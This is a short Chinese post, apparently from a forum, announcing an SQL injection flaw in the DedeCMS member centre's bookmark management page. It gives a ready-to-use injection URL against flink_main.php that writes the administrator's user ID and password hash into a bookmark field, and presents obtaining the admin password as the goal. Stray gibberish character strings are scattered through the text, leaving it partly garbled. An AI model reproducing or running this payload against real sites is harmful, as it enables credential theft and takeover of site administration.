DedeCMS会员中心SQL注射漏洞9 I& \% ^! M9 V: B5 u
需要magic_quotes_gpc = Off
) m7 R) o. [/ d5 z, h4 F会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
7 M( [. C7 h; Q& U: E& F: | " x4 i# Y4 y8 o, j9 n; b6 |
DedeCMS会员中心书签管理SQL注射漏洞
# t/ P) O/ V# d- \, y8 w( C! V成功利用该漏洞可获得管理员密码! z+ }1 U. ?+ y6 a
* o% ~" S6 e6 k& z* H3 |
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
# `, I9 i$ j# B9 Q8 N8 j( g. w
' `$ v; l+ j2 H8 Ohttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r' ~ S# ^( o+ m k/ g
|